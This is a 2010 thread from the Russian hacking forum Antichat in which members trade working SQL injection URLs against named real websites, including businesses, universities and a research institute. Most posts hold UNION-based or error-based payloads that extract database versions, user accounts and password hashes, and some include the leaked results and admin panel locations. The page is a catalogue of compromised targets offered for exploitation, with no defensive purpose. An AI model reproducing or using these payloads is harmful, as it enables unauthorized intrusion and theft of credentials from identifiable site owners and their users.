ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12371  
Старый 14.06.2010, 22:04
Аватар для LanSilot
LanSilot
Новичок
Регистрация: 10.04.2010
Сообщений: 20
Провел на форуме:
187365

Репутация: 14
Отправить сообщение для LanSilot с помощью ICQ
По умолчанию

"КОНСАЛТИНВЕСТ"

Код:
http://www.consult-invest.ru/news.php?id=-4881'+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13+from+phpbb_users+limit+1,1--+

Последний раз редактировалось LanSilot; 14.06.2010 в 22:08..
 
Ответить с цитированием

  #12372  
Старый 15.06.2010, 00:36
Аватар для rbul
rbul
Новичок
Регистрация: 19.05.2010
Сообщений: 4
Провел на форуме:
188246

Репутация: 1
По умолчанию

PR 4

Код:
http://chgk.com.ru/person.php?id=-113+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,6,7%20--
4.1.25-log
chgkcom2_user@localhost
chgkcom2_chgk
 
Ответить с цитированием

  #12373  
Старый 15.06.2010, 03:16
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

Код:
http://www.hamptonrovers.com.au/news/news.php?newsid=-55+union+select+1,2,column_name,4,5,6+from+information_schema.columns+where+table_name=0x7573657273+--
MySQL 5.0.90-community
Код:
http://www.hamptonrovers.com.au/news/news.php?newsid=-55+union+select+1,2,concat_ws(0x3a,id,username,password),4,5,6+from+mymail_users+--
panel:
Цитата:
http://www.hamptonrovers.com.au/admin/
 
Ответить с цитированием

  #12374  
Старый 15.06.2010, 08:40
Аватар для LanSilot
LanSilot
Новичок
Регистрация: 10.04.2010
Сообщений: 20
Провел на форуме:
187365

Репутация: 14
Отправить сообщение для LanSilot с помощью ICQ
По умолчанию

ФОНД-FOREX

Код:
http://www.market-profit.com/news.php?id=-13+%27+union+all+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5--+

Последний раз редактировалось LanSilot; 15.06.2010 в 08:54..
 
Ответить с цитированием

  #12375  
Старый 15.06.2010, 15:27
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://downloads.e3dengine.com/files.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3+--+
e3dengine.com@10.0.0.221: pages_e3dengine_com:5.0.90-log
 
Ответить с цитированием

  #12376  
Старый 15.06.2010, 15:30
Аватар для LanSilot
LanSilot
Новичок
Регистрация: 10.04.2010
Сообщений: 20
Провел на форуме:
187365

Репутация: 14
Отправить сообщение для LanSilot с помощью ICQ
По умолчанию

Internet Money Portal

Код:
http://monitor.newimp.info/news.php?id=-45+%27+union+all+select+1,concat(id_user,0x3a,login,0x3a,haslo,0x3a,mail),3,4+from+users--+
 
Ответить с цитированием

  #12377  
Старый 15.06.2010, 16:44
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

www.cide.edu

http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat _ws(char(58),user(),version(),database(),@@version _compile_os)+from+mysql.user+limit+0,1),floor(rand (0)*2))from(information_schema.tables)group+by+2)--+


http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat (username,char(58),user_password)+from+bd_mapp.php bb_users+limit+1,1),floor(rand(0)*2))from(informat ion_schema.tables)group+by+2)--+

http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat (user,char(58),password)+from+mysql.user+limit+0,1 ),floor(rand(0)*2))from(information_schema.tables) group+by+2)--+


PR-7
 
Ответить с цитированием

  #12378  
Старый 15.06.2010, 17:45
Аватар для gars0n
gars0n
Постоянный
Регистрация: 09.12.2009
Сообщений: 502
Провел на форуме:
2073846

Репутация: 186


Отправить сообщение для gars0n с помощью ICQ
По умолчанию

Код:
http://www.lannaworld.com/cgi/lannaboard/reply_topic.php?id=-785+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9--
5.1.39-log
lannaworld
lannaworld@nassau.dreamhost.com

Код:
http://classes.dma.ucla.edu/Winter06/161B/projects/ed/DRAview.php?article=-2+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4,5,6,7,8,9,10,11,12,13--
5.0.77
edchao
edchao@ha.design.ucla.edu

Код:
http://www.economiaparatodos.com.ar/ver_nota.php?nota=-1+UNION+SELECT+1,concat_Ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+
User: uv7450_ept@localhost
Database: ept_v3
Version: 5.0.45-Max-log

Код:
http://www.saltwatercharterswa.com.au/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28user%28%29, database%28%29,version%28%29%29,2,3,4+--+
Version: 5.0.51a-24
User: myswcw1000@ws-shared
Database: netswcwa_saltwatercharterswa_com_au

Последний раз редактировалось gars0n; 15.06.2010 в 18:14..
 
Ответить с цитированием

  #12379  
Старый 15.06.2010, 19:41
Аватар для Bramin
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

http://www.smu17.ru/story.php?id=-2+union+select+1,group_concat(0x0b,table_name)+fro m+information_schema.tables--

PR6

http://www1.assumption.edu/admin/hotnews/story.php?id=-2+union+select+1,group_concat(0x0b,name_usr,0x3a,p assword_usr),3,4,5,6,7,8+from+choir_admin--

http://mortgagehc.com/story.php?id=-2+union+select+1,2,3,group_concat(0x0b,table_name) +from+information_schema.tables--

Последний раз редактировалось Bramin; 15.06.2010 в 20:28..
 
Ответить с цитированием

  #12380  
Старый 15.06.2010, 19:50
Аватар для BlackFan
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442

Репутация: 41
По умолчанию

Код:
http://wap.javagames.su/l/d/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user_login,user_name,user_pass,md5_pass,user_email),13,14,15,16,17,18,19,20,21+from+_users+--+/
admin_javagames@localhost
admin_javagames
5.1.14-beta
пароли отдельно в base64 и md5


Код:
http://poly.wao.ru/load/cat/all/0+union+select+1,2,concat_ws(0x3a,user(),database(),version())/
admin_wao_ru@localhost
admin_wao_ru
4.1.20
отображает и сразу редиректит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ